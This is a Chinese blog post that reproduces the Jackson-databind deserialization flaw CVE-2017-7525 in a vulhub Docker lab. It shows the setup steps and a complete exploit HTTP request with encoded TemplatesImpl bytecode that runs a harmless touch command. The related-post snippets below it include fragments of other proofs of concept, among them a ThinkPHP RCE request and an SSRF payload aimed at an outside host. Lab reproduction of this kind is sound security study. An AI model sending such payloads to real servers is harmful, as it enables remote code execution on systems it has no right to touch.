Jackson-databind 反序列化漏洞复现(CVE-2017-7525)

最新推荐文章于 2024-05-03 22:30:16 发布
最新推荐文章于 2024-05-03 22:30:16 发布
阅读量3.2k 收藏 3
点赞数
分类专栏: 漏洞复现 环境搭建
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/106364943
版权

Jackson-databind 反序列化漏洞复现(CVE-2017-7525)

环境搭建

启动docker

systemctl start docker

下载环境

git clone https://github.com/vulhub/vulhub.git

也可以使用码云上个人维护的镜像

git clone https://gitee.com/fahawifi/vulhub.git

生成docker环境

cd /root/vulhub/jackson/CVE-2017-7525
docker-compose up -d
docker ps

查看到docker容器运行

漏洞检测

区分 Fastjson 和 Jackson

{"name":"S", "age":21}

{"name":"S", "age":21,"agsbdkjada__ss_d":123}

这两个fastjson都不会报错,而jackson会报错,因为Jackson 因为强制 key 与 javabean 属性对齐,只能少不能多 key,所以会报错。

漏洞复现

访问

http://192.168.164.152:8080/

这里的ip为我虚拟机的ip
在这里插入图片描述
进入docker容器命令行

docker exec -it 14f /bin/bash
cd /tmp
ls

在这里插入图片描述
这里的14f是docker ps命令的CONTAINER ID
发送数据包

POST /exploit HTTP/1.1
Host: 192.168.164.152:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298

{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}

发送数据包
在这里插入图片描述
执行了touch /tmp/prove1.txt命令

小结

对于这个漏洞只是复现,对于原理包括payload的修改一点都不会,所以以后需要补上

参考文章

https://github.com/vulhub/vulhub/tree/master/jackson/CVE-2017-7525

whojoe
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Jackson-databind 反序列化漏洞CVE-2017-7525
锋刃科技的博客
06-17 3673
漏洞原理 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。 所以,本漏洞利用条件如下: 开启 Jackso
jackson CVE-2017-7525 漏洞复现
Shanfenglan's blog
11-29 1603
CVE-2017-7525 Jackson-databind 反序列化漏洞 原理 Jackson-databind 在设置 Target class 成员变量参数值时,若没有对应的 getter 方法,则会使用 SetterlessProperty 调用 getter 方法,获取变量,然后设置变量值。当调用 getOutputProperties() 方法时,会初始化 transletBytecodes 包含字节码的类,导致命令执行,具体可参考 java-deserialization-jdk7u21-ga
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1156
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
2024年网络安全最新再爆安全漏洞,这次轮到Jackson了,竟由阿里云上报
最新发布
2401_84297455的博客
05-03 1018
熟悉A哥的小伙伴知道,自从Fastjson上次爆出重大安全漏洞之后,我彻底的投入到了Jackson的阵营,工作中也慢慢去Fastjson化。
Jackson-databind 反序列化漏洞CVE-2017-7525&CVE-2017-17485)
EC_Carrot的博客
07-03 741
漏洞详细 具体详细请移步:https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 因为本人实在不懂这方面,只能先复现,然后慢慢磨了。 漏洞复现 CVE-2017-7525 发送以下数据包,即可执行touch /tmp/prove1.txt命令 POST /exploit HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en
vulhub漏洞复现29_Jackson
weixin_44193247的博客
02-03 1008
vulhub漏洞复现练习篇
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
jackson-databind-2.9.10.8.jar升级相关jar包
04-21
jackson-databind-2.9.10.8.jar升级相关jar包包含: jackson-module-jaxb-annotations-2.9.10.jar jackson-core-2.9.10.jar jackson-databind-2.9.10.8.jar jackson-annotations-2.9.10.jar jackson-jaxrs-json-...
jackson-databind-vuln:Jackson Databind漏洞
05-26
杰克逊·德宾宾·沃恩 Jackson Databind漏洞
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
CVE-2020-8840 FasterXML / jackson-databind远程代码执行漏洞
jackson-databind-2.8.4.jar
04-28
jackson-databind-2.8.4.jar
Jackson反序列化远程代码执行漏洞CVE-2020-24616)复现
锋刃科技的博客
04-26 2644
简介 FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。jackson-databind是其中的一个具有数据绑定功能的组件。 影响版本 jackson-databind < 2.9.10.6 环境搭建 搭建一个Java项目,新建一个Poc类,下载并导入存在漏洞的包 导入存在漏洞的包 exp文件 编译并启动环境 javac Exploit.java py -3 -m http.server 88...
自检代码中trustmanager漏洞_Fasterxml Jacksondatabind漏洞分析与利用
weixin_39640767的博客
11-22 775
一、 Fasterxml Jackson-databind组件介绍FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。Jackson-databind是其中的一个具有数据绑定功能的组件。Jackson-databind可以将Java对象转换成json对象,同样也可以将json转换成Java对象。二、各版本介绍Fasterxml的jackson...
jackson框架java反序列化漏洞_Jackson CVE-2019-12384: 反序列化漏洞复现
weixin_39830200的博客
02-23 397
文章参考:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html环境搭建引入jar包:ssrf payload:"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]...
jackson多态序列化与反序列化
骑着蜗牛向前跑的博客
07-07 2116
前几天遇到个问题,场景大概是 list 中既有父类又有子类,在反序列化时丢掉了子类的信息。解决这个问题也没花多少时间,不过还是打算记录下。参考链接如下: Jackson JSON - Using @JsonTypeInfo annotation to handle polymorphic types 我使用 Jackson 实现序列化和反序列化。它在处理多态序列化时的思路是,构造一个起到标识作用的成员变量,并将该成员变量序列化到最终的字符串中,这样在反序列化的时候,jackson一看到这个标识符就知道该朝着
FastJson 漏洞复现
来日可期的博客
09-11 1810
FastJson 1.2.24 反序列化导致任意命令执行漏洞,Fastjson 1.2.47 远程命令执行漏洞
Jackson-databind 反序列化漏洞CVE-2017-17485)
锋刃科技的博客
06-17 1853
漏洞搭建 cd /root/vulhub/jackson/CVE-2017-7525 docker-compose up -d 漏洞原理 利用 FileSystemXmlApplicationContext加载远程 bean 定义文件,创建 ProcessBuilder bean,并在 xml 文件中使用 Spring EL 来调用 start()方法实现命令执行 CVE-2017-7525 黑名单修复绕过,利用了 org.springframework.context.suppor...
jackson框架java反序列化漏洞_Jackson enableDefaultTyping 方法反序列化代码执行漏洞(CVE-2017-7525)...
weixin_35983968的博客
02-23 446
Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed a...
漏洞复现CVE-2017-12615)
PDblue的博客
03-27 4363
使用https://github.com/vulhub/vulhub/搭建漏洞测试环境 搭建完成后访问http://host:8080 使用burpsuite抓包,修改数据包进行后门文件上传 上传完成后网站返回201 通过浏览器访问后门文件测试是否上传成功 后门文件成功执行命令,说明漏洞利用成功...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值